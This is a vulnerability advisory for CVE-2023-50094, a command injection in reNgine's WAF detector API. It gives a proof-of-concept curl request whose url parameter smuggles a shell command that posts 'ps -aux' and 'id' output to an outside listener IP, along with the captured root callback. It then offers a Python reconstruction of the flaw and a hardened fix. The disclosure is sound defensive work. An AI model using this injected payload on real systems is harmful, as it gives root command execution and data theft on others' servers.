CVE-2023-50094 - OS Command Injection in reNgine
Description
An authenticated OS Command Injection vulnerability exists in multiple versions of reNgine, including the latest release version v2.0.2. By sending a crafted URL to the server, arbitrary OS commands may be injected into subprocess.check_output and executed as the root user on the web service container.
Location
This vulnerability is present in the WAF Detect functionality of reNgine.
Endpoint:  POST https://rengine/api/tools/waf_detector
Parameter: url
Proof of Concept
0x01. Authenticate to reNgine.
0x02. Start a callback listener: sudo nc -nvlp 80
0x03. Execute the following curl command using the authenticated session cookie:
curl -k -b "sessionid=fykexm0q2eec5xrb8quu9r9talmin7nl" 'https://rengine/api/tools/waf_detector/?format=json&url=https://www.example.com;curl%20-X%20POST%20--data%20"$(ps%20-aux)"%20192.168.1.91/?`id`'
0x04. Receive the callback containing the output from executing id and ps -aux:
2023-12-28 12:00:46 CST:~$ netcat -nvlp 80
Connection from 192.168.1.131:32996
POST /?uid=0(root) HTTP/1.1
Host: 192.168.1.91
User-Agent: curl/7.81.0
Accept: */*
Content-Length: 637
Content-Type: application/x-www-form-urlencoded
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 4360 1920 ? Ss 18:00 0:00 /bin/bash /usr/src/app/entrypoint.sh
root 33 0.1 0.3 77312 54268 ? S 18:00 0:00 python3 manage.py runserver 0.0.0.0:8000
root 34 4.1 0.8 538428 137560 ? Sl 18:00 0:11 /usr/bin/python3 manage.py runserver 0.0.0.0:8000
root 107 0.0 0.0 2888 1152 ? S 18:05 0:00 /bin/sh -c wafw00f https://www.example.com;curl -X POST --data "$(ps -aux)" 192.168.1.91/?`id`
root 109 0.0 0.0 7436 2176 ? R 18:05 0:00 ps -aux
Impact
An attacker with a valid session ID may execute arbitrary OS commands on the web service container of reNgine.
Recommended CVSSv3.1: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N (https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N&version=3.1)
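The root cause visible in the process listing above is the url parameter being spliced into a /bin/sh command string. The following is an added example and not reNgine's own code: a hypothetical reconstruction of that pattern next to a hardened wrapper that validates the target against a strict allowlist and hands it to wafw00f as an argv list with no shell (all function names and the allowlist are assumptions).

```python
import re
import subprocess
from urllib.parse import urlparse

# Hypothetical reconstruction of the vulnerable pattern (not reNgine's source):
# the url parameter is spliced into a shell string, so ";", "$(...)" and
# backticks in it are parsed by /bin/sh, exactly as the ps listing shows.
def waf_detect_vulnerable(url: str) -> str:
    return subprocess.check_output(f"wafw00f {url}", shell=True, text=True)

# Allowlists, deliberately narrower than RFC 3986: a scan target needs no more.
_HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
                      r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)*$")
_REST_RE = re.compile(r"^[A-Za-z0-9._~%/?=&:@+-]*$")  # path and query

def validate_target_url(url: str) -> str:
    """Return url unchanged if it is a plain http(s) URL, else raise ValueError."""
    if len(url) > 2048 or any(c.isspace() or ord(c) < 32 for c in url):
        raise ValueError("whitespace or control characters in URL")
    parts = urlparse(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("only http/https targets are accepted")
    if not parts.hostname or not _HOST_RE.match(parts.hostname):
        raise ValueError("invalid hostname")
    if "@" in parts.netloc:
        raise ValueError("credentials in URL are not allowed")
    _ = parts.port  # urllib itself raises ValueError for a non-numeric port
    if parts.fragment or not (_REST_RE.match(parts.path) and _REST_RE.match(parts.query)):
        raise ValueError("unexpected characters in path or query")
    return url

def is_safe_target(url: str) -> bool:
    try:
        validate_target_url(url)
        return True
    except ValueError:
        return False

def build_wafw00f_argv(url: str) -> list[str]:
    """argv for wafw00f; the scheme check also guarantees the target can never
    start with '-' and be parsed as a wafw00f option (argument injection)."""
    return ["wafw00f", validate_target_url(url)]

def waf_detect_safe(url: str) -> str:
    # No shell: the argv list goes straight to execve, so nothing in the URL
    # can be interpreted as shell syntax. The timeout bounds a hung scanner.
    return subprocess.check_output(build_wafw00f_argv(url), text=True, timeout=60)
```

Dropping shell=True is the actual fix; the validator is defence in depth so that the argument stays inert even if a later change passes it to another tool.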
Disclosure Timeline
- February 12, 2023 - Initial disclosure to project maintainer via huntr.dev in accordance with the project’s policy (https://huntr.com/bounties/c046c9b7-f397-4650-af3f-fa0451548452/)
  - no response
- March 23, 2023 - Updated disclosure showing the proof of concept is still valid against master commit e3dc06a4ee08c6a1c5fa7d84d7a0de4dac93315a
  - no response
- November 30, 2023 - Applied for CVE ID
- December 20, 2023 - Final attempt to contact maintainer
  - no response
- December 28, 2023 - Public disclosure (current document)